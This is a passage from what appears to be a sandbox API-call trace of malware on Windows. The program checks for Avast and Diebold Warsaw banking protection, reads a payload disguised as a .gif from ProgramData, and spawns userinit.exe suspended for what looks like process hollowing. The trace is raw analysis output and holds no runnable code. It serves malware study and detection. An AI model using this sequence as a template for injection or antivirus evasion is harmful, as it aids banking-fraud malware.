[47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd5000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x14fca0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0158.015] ResumeThread (hThread=0x120) returned 0x1
[0158.015] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0158.015] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0158.015] GlobalUnlock (hMem=0x189000c) returned 0
[0158.015] GlobalHandle (pMem=0x1fd0f0) returned 0x1890004
[0158.015] GlobalUnlock (hMem=0x1890004) returned 0
[0158.022] Sleep (dwMilliseconds=0xe74e)
[0168.037] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0168.037] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0168.037] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0168.037] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0168.037] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128
[0168.038] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c8*=0) returned 0x0
[0168.038] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0168.038] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x5e000
[0168.038] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0168.040] GlobalLock (hMem=0x1890004) returned 0x1fd0f0
[0168.040] ReadFile (in: hFile=0x128, lpBuffer=0x1fd0f0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0xee1dc, lpOverlapped=0x0 | out: lpBuffer=0x1fd0f0*, lpNumberOfBytesRead=0xee1dc*=0x5e000, lpOverlapped=0x0) returned 1
[0168.041] CloseHandle (hObject=0x128) returned 1
[0168.042] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.042] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.042] GlobalUnlock (hMem=0x189000c) returned 0
[0168.042] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4000, uFlags=0x2) returned 0x189000c
[0168.042] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.043] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.043] GlobalUnlock (hMem=0x189000c) returned 0
[0168.043] GlobalReAlloc (hMem=0x189000c, dwBytes=0x6000, uFlags=0x2) returned 0x189000c
[0168.044] GlobalLock (hMem=0x189000c) returned 0x25f110
[0168.044] GlobalHandle (pMem=0x25f110) returned 0x189000c
[0168.044] GlobalUnlock (hMem=0x189000c) returned 0
[0168.044] GlobalReAlloc (hMem=0x189000c, dwBytes=0x8000, uFlags=0x2) returned 0x189000c
[0168.045] GlobalLock (hMem=0x189000c) returned 0x265120
[0168.045] GlobalHandle (pMem=0x265120) returned 0x189000c
[0168.045] GlobalUnlock (hMem=0x189000c) returned 0
[0168.045] GlobalReAlloc (hMem=0x189000c, dwBytes=0xa000, uFlags=0x2) returned 0x189000c
[0168.045] GlobalLock (hMem=0x189000c) returned 0x265120
[0168.046] GlobalHandle (pMem=0x265120) returned 0x189000c
[0168.046] GlobalUnlock (hMem=0x189000c) returned 0
[0168.046] GlobalReAlloc (hMem=0x189000c, dwBytes=0xc000, uFlags=0x2) returned 0x189000c
[0168.047] GlobalLock (hMem=0x189000c) returned 0x26f130
[0168.048] GlobalHandle (pMem=0x26f130) returned 0x189000c
[0168.048] GlobalUnlock (hMem=0x189000c) returned 0
[0168.048] GlobalReAlloc (hMem=0x189000c, dwBytes=0xe000, uFlags=0x2) returned 0x189000c
[0168.048] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.048] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.048] GlobalUnlock (hMem=0x189000c) returned 0
[0168.048] GlobalReAlloc (hMem=0x189000c, dwBytes=0x10000, uFlags=0x2) returned 0x189000c
[0168.048] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.049] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.049] GlobalUnlock (hMem=0x189000c) returned 0
[0168.049] GlobalReAlloc (hMem=0x189000c, dwBytes=0x12000, uFlags=0x2) returned 0x189000c
[0168.049] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.050] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.050] GlobalUnlock (hMem=0x189000c) returned 0
[0168.050] GlobalReAlloc (hMem=0x189000c, dwBytes=0x14000, uFlags=0x2) returned 0x189000c
[0168.050] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.051] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.051] GlobalUnlock (hMem=0x189000c) returned 0
[0168.051] GlobalReAlloc (hMem=0x189000c, dwBytes=0x16000, uFlags=0x2) returned 0x189000c
[0168.051] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.051] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.051] GlobalUnlock (hMem=0x189000c) returned 0
[0168.051] GlobalReAlloc (hMem=0x189000c, dwBytes=0x18000, uFlags=0x2) returned 0x189000c
[0168.051] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.052] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.052] GlobalUnlock (hMem=0x189000c) returned 0
[0168.052] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1a000, uFlags=0x2) returned 0x189000c
[0168.052] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.053] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.053] GlobalUnlock (hMem=0x189000c) returned 0
[0168.053] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1c000, uFlags=0x2) returned 0x189000c
[0168.053] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.054] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.054] GlobalUnlock (hMem=0x189000c) returned 0
[0168.054] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1e000, uFlags=0x2) returned 0x189000c
[0168.054] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.054] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.054] GlobalUnlock (hMem=0x189000c) returned 0
[0168.054] GlobalReAlloc (hMem=0x189000c, dwBytes=0x20000, uFlags=0x2) returned 0x189000c
[0168.054] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.055] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.055] GlobalUnlock (hMem=0x189000c) returned 0
[0168.055] GlobalReAlloc (hMem=0x189000c, dwBytes=0x22000, uFlags=0x2) returned 0x189000c
[0168.056] GlobalLock (hMem=0x189000c) returned 0x27b110
[0168.057] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0168.057] GlobalUnlock (hMem=0x189000c) returned 0
[0168.057] GlobalReAlloc (hMem=0x189000c, dwBytes=0x24000, uFlags=0x2) returned 0x189000c
[0168.057] GlobalLock (hMem=0x189000c) returned 0x27b110
[0168.058] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0168.058] GlobalUnlock (hMem=0x189000c) returned 0
[0168.058] GlobalReAlloc (hMem=0x189000c, dwBytes=0x26000, uFlags=0x2) returned 0x189000c
[0168.059] GlobalLock (hMem=0x189000c) returned 0x29f120
[0168.060] GlobalHandle (pMem=0x29f120) returned 0x189000c
[0168.060] GlobalUnlock (hMem=0x189000c) returned 0
[0168.060] GlobalReAlloc (hMem=0x189000c, dwBytes=0x28000, uFlags=0x2) returned 0x189000c
[0168.060] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.061] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.061] GlobalUnlock (hMem=0x189000c) returned 0
[0168.061] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2a000, uFlags=0x2) returned 0x189000c
[0168.061] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.061] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.061] GlobalUnlock (hMem=0x189000c) returned 0
[0168.061] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2c000, uFlags=0x2) returned 0x189000c
[0168.061] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.062] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.062] GlobalUnlock (hMem=0x189000c) returned 0
[0168.062] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2e000, uFlags=0x2) returned 0x189000c
[0168.062] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.063] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.063] GlobalUnlock (hMem=0x189000c) returned 0
[0168.063] GlobalReAlloc (hMem=0x189000c, dwBytes=0x30000, uFlags=0x2) returned 0x189000c
[0168.063] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.064] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.064] GlobalUnlock (hMem=0x189000c) returned 0
[0168.064] GlobalReAlloc (hMem=0x189000c, dwBytes=0x32000, uFlags=0x2) returned 0x189000c
[0168.064] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.064] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.064] GlobalUnlock (hMem=0x189000c) returned 0
[0168.064] GlobalReAlloc (hMem=0x189000c, dwBytes=0x34000, uFlags=0x2) returned 0x189000c
[0168.064] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.065] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.065] GlobalUnlock (hMem=0x189000c) returned 0
[0168.065] GlobalReAlloc (hMem=0x189000c, dwBytes=0x36000, uFlags=0x2) returned 0x189000c
[0168.065] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.066] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.066] GlobalUnlock (hMem=0x189000c) returned 0
[0168.066] GlobalReAlloc (hMem=0x189000c, dwBytes=0x38000, uFlags=0x2) returned 0x189000c
[0168.066] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.067] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.067] GlobalUnlock (hMem=0x189000c) returned 0
[0168.067] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3a000, uFlags=0x2) returned 0x189000c
[0168.067] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.067] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.067] GlobalUnlock (hMem=0x189000c) returned 0
[0168.067] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3c000, uFlags=0x2) returned 0x189000c
[0168.067] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.068] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.068] GlobalUnlock (hMem=0x189000c) returned 0
[0168.068] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3e000, uFlags=0x2) returned 0x189000c
[0168.068] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.069] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.069] GlobalUnlock (hMem=0x189000c) returned 0
[0168.069] GlobalReAlloc (hMem=0x189000c, dwBytes=0x40000, uFlags=0x2) returned 0x189000c
[0168.069] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.070] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.070] GlobalUnlock (hMem=0x189000c) returned 0
[0168.070] GlobalReAlloc (hMem=0x189000c, dwBytes=0x42000, uFlags=0x2) returned 0x189000c
[0168.070] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.070] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.070] GlobalUnlock (hMem=0x189000c) returned 0
[0168.070] GlobalReAlloc (hMem=0x189000c, dwBytes=0x44000, uFlags=0x2) returned 0x189000c
[0168.071] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.071] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.071] GlobalUnlock (hMem=0x189000c) returned 0
[0168.071] GlobalReAlloc (hMem=0x189000c, dwBytes=0x46000, uFlags=0x2) returned 0x189000c
[0168.071] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.072] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.072] GlobalUnlock (hMem=0x189000c) returned 0
[0168.072] GlobalReAlloc (hMem=0x189000c, dwBytes=0x48000, uFlags=0x2) returned 0x189000c
[0168.072] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.073] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.073] GlobalUnlock (hMem=0x189000c) returned 0
[0168.073] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4a000, uFlags=0x2) returned 0x189000c
[0168.073] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.073] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.073] GlobalUnlock (hMem=0x189000c) returned 0
[0168.073] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4c000, uFlags=0x2) returned 0x189000c
[0168.073] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.074] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.074] GlobalUnlock (hMem=0x189000c) returned 0
[0168.074] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4e000, uFlags=0x2) returned 0x189000c
[0168.074] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.075] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.075] GlobalUnlock (hMem=0x189000c) returned 0
[0168.075] GlobalReAlloc (hMem=0x189000c, dwBytes=0x50000, uFlags=0x2) returned 0x189000c
[0168.075] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.076] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.076] GlobalUnlock (hMem=0x189000c) returned 0
[0168.076] GlobalReAlloc (hMem=0x189000c, dwBytes=0x52000, uFlags=0x2) returned 0x189000c
[0168.076] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.077] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.077] GlobalUnlock (hMem=0x189000c) returned 0
[0168.077] GlobalReAlloc (hMem=0x189000c, dwBytes=0x54000, uFlags=0x2) returned 0x189000c
[0168.077] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.077] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.077] GlobalUnlock (hMem=0x189000c) returned 0
[0168.077] GlobalReAlloc (hMem=0x189000c, dwBytes=0x56000, uFlags=0x2) returned 0x189000c
[0168.077] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.078] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.078] GlobalUnlock (hMem=0x189000c) returned 0
[0168.078] GlobalReAlloc (hMem=0x189000c, dwBytes=0x58000, uFlags=0x2) returned 0x189000c
[0168.078] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.079] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.079] GlobalUnlock (hMem=0x189000c) returned 0
[0168.079] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5a000, uFlags=0x2) returned 0x189000c
[0168.079] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.080] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.080] GlobalUnlock (hMem=0x189000c) returned 0
[0168.080] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5c000, uFlags=0x2) returned 0x189000c
[0168.080] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.080] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.080] GlobalUnlock (hMem=0x189000c) returned 0
[0168.080] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5e000, uFlags=0x2) returned 0x189000c
[0168.081] GlobalLock (hMem=0x189000c) returned 0x25b100
[0168.081] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1b0c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1b0c10 | out: lpCommandLine="", lpProcessInformation=0x1b0c10*(hProcess=0x124, hThread=0x128, dwProcessId=0x850, dwThreadId=0x518)) returned 1
[0168.130] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000
[0168.130] GetThreadContext (in: hThread=0x128, lpContext=0x1c0000 | out: lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd7000, Edx=0x0, Ecx=0x0, Eax=0xd2be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0xafad8, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, 